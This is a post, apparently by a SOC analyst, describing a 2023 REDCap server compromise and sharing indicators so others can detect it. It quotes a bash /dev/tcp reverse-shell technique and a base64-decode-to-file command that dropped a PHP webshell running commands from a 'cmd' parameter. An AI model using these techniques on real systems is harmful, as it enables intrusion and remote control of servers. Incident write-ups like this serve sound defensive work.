Intro

I saw Google Threat Intelligence teams article regarding REDCap exploitation here: Public and Private Medical Community Targeted by China-Nexus Threat Actor Pursuing Artificial Intelligence, Cyber, Medical, and National Defense Research - https://cloud.google.com/blog/topics/threat-intelligence/prc-targets-us-medical-research

"The earliest known compromise occurred in September 2023, after which GTIG observed a consistent operational pattern. The threat actor exploited externally facing REDCap (Research Electronic Data Capture) servers and deployed custom malware named INFINITERED to capture legitimate REDCap login credentials. " -from the article

They also said the following: "GTIG was not able to confirm how UNC6508 initially gained access to the REDCap server. " 

This article caught my attention because I (technically, Crowdstrike generated the alert) saw REDCap getting exploited in 2023 as well but it was different and I never got closure on how it was exploited. I did a ton of searching online and read patch notes but never figured out how the exploitation may have happened. 

The exploitation I saw was a bit different than what Google Threat Intelligence group saw. I'm posting this to share what I saw. 

Activity seen

This activity was observed in September 2023. 

Crowdstrike alerted on Apache process spawning some bash commands.

Apache server was hosting REDCap app. I'm unsure about the version. 

One of the commands was for doing bash reverse shell via bash -i >& /dev/tcp technique. 

Searching the rev shell destination IP shows a report by Fortinet regarding the IP exploiting TeamCity vuln in 2023 and actor potentially being APT29. (just mentioning what I saw. I'm not doing attribution. I also know what Pyramid of Pain is as well.)

There was another command that was executed. It was sh -c echo BASE64 | base64 -d | tee DIRECTORY/update.php

This wrote a basic php shell to disk, which took GET request w/ "update_process" AND "cmd" parameters and executed commands via system().

(I kept watching VirusTotal for the file hash and content expecting some web admin to find the file and upload it but I have not seen this file get uploaded. Could be because its easy to read and see its just a simple webshell)

Log review did not show any commands in URI's or provide clear info on how this exploitation could've happened. 

This may have been done via POST request, though some cookie values or headers, abuse of existing compromise, or some other way. I have no idea. The software isn't open source so there isn't anything I could've done further to research how the compromise happened. 

In 2024, assuming that the threat actor exploited more REDCap instances the same way, I did some research. I did find multiple (maybe about 50) compromised REDCap instances, all over the world. There were various REDCap versions seen being hosted on various servers (apache, nginx, etc..). It's always possible that an older version was exploited then the victim updated and I saw compromised server with different version.

Conclusion

Maybe check for file update.php w/ content  "update_process" AND "cmd" on your redcap server or check web traffic logs for URI containing update.php AND update_process AND cmd? I'd hope the file was detected and cleaned up by now since this happened in 2023.

I'd love to know more details about how the initial exploitation happened and what the attackers actually did afterwards.

At the end of the day, I'm just a soc analyst with limited telemetry and there is always another alert in the queue that needs to be worked... :(